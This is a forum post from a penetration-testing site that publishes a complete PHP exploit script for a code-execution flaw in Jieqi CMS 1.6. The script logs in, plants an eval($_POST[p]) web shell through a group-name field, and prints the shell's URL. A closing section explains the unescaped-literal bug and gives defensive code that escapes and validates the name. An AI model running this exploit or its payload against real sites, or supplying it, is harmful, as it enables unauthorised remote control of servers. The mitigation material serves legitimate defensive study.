China Network Penetration Testing Alliance (中国网络渗透测试联盟)
Title: Jieqi (杰奇) CMS V1.6 PHP code execution 0day exploit
Author: admin
Time: 2013-2-23 11:28
Jieqi Website Management System (JIEQI CMS for short; China National Copyright Administration software registration number 2006SR03382) is a modular site-building system that is simple and flexible, high-performance, and safe and reliable. We offer the currently most popular Jieqi serialized-novel system, the Jieqi original comics system and digital publishing solutions, as well as custom website development services of all kinds.

This system has several remote security vulnerabilities. The one reported today is a remote code execution vulnerability in version 1.6, which should be more than two years old by now.

It requires a user account that is allowed to create a group (圈子).
<?php
print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
');

/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path username password
host:     target server (ip/hostname)
path:     path to jieqicms
username: a username who can create group
password: password of that user
Example:
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host     = $argv[1];
$path     = $argv[2];
$username = $argv[3];
$password = $argv[4];

/* get cookie */
$cookie_jar_index = 'cookie.txt';
$url1   = "http://$host/$path/login.php";
$params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1";
$curl1  = curl_init();
curl_setopt($curl1, CURLOPT_URL, $url1);
curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index);
curl_setopt($curl1, CURLOPT_POST, 1);
curl_setopt($curl1, CURLOPT_POSTFIELDS, $params);
ob_start();
$data1 = curl_exec($curl1);
if ($data1 === FALSE) {
    echo "cURL Error: " . curl_error($curl1); // the original referenced an undefined $ch here
    exit('exploit failed');
}
curl_close($curl1);
ob_clean();

/* get shell: the group name is written unescaped into a PHP string literal in info.php */
$params  = '-----------------------------23281168279961
Content-Disposition: form-data; name="gname"

';
$params .= "';";
$params .= 'eval($_POST[p]);//flyh4t
-----------------------------23281168279961
Content-Disposition: form-data; name="gcatid"

1
-----------------------------23281168279961
Content-Disposition: form-data; name="gaudit"

1
-----------------------------23281168279961
Content-Disposition: form-data; name="gbrief"

1
-----------------------------23281168279961--
';
$url2   = "http://$host/$path/modules/group/create.php";
$curl2  = curl_init();
$header = array(
    'Content-Type: multipart/form-data; boundary=---------------------------23281168279961'
);
curl_setopt($curl2, CURLOPT_URL, $url2);
curl_setopt($curl2, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index);
curl_setopt($curl2, CURLOPT_POST, 1);
curl_setopt($curl2, CURLOPT_POSTFIELDS, $params);
ob_start();
curl_exec($curl2);
curl_close($curl2);
$resp = ob_get_contents(); // $resp holds the returned page content
ob_clean();

// the response carries the id of the newly created group as g=<id>
preg_match('/g=([0-9]{1,4})/', $resp, $shell);
//print_r($shell);
//print_r($resp);
$url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php";
echo "view your shell here (password: p)\r\n";
echo $url;
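The injection works because the group name is copied into the generated files/group/userdir/0/<id>/info.php as a bare PHP string literal, so a name containing ';' closes the literal and whatever follows runs on every include. The following is an added example, not Jieqi CMS code (file and function names are assumed): it shows how a generated PHP file should serialise user data so the page's payload round-trips as plain data, with a whitelist on the name as a second layer.

```php
<?php
// Added example, not Jieqi CMS code. It addresses the bug class only: a group
// name pasted into a generated PHP file as $gname = '<name>'; with no escaping,
// so a name containing ';  closes the literal and the remainder becomes code.
// File names and function names here are assumed for the demonstration.

/** Reject names that have no business in a group title. Whitelist, not blacklist. */
function validate_group_name(string $gname): bool
{
    return (bool) preg_match('/^[\p{L}\p{N} _-]{1,64}$/u', $gname);
}

/**
 * Write the generated file so that $gname is always a string literal.
 * var_export() escapes both ' and \, so no input can terminate the literal.
 */
function write_group_info(string $file, string $gname): void
{
    $code = "<?php\n\$gname = " . var_export($gname, true) . ";\n";
    if (file_put_contents($file, $code, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $file");
    }
}

/** Load the generated file and return the stored name, as the CMS would on include. */
function read_group_info(string $file): string
{
    $gname = null;
    include $file;
    return (string) $gname;
}

// Self-check with the payload from the post, constructed locally as plain data.
$payload = "';eval(\$_POST[p]);//flyh4t";
$file    = sys_get_temp_dir() . '/group_info_example.php';

// Layer 1: the whitelist refuses the name outright.
var_dump(validate_group_name($payload));
var_dump(validate_group_name('Fantasy readers'));

// Layer 2: even if validation were skipped, escaping keeps the name data, not code.
write_group_info($file, $payload);
var_dump(read_group_info($file) === $payload);
unlink($file);
```

Storing group metadata as JSON or in the database instead of in a PHP file removes this bug class entirely, since nothing user-controlled is ever parsed as code.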
Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/)
Powered by Discuz! X3.2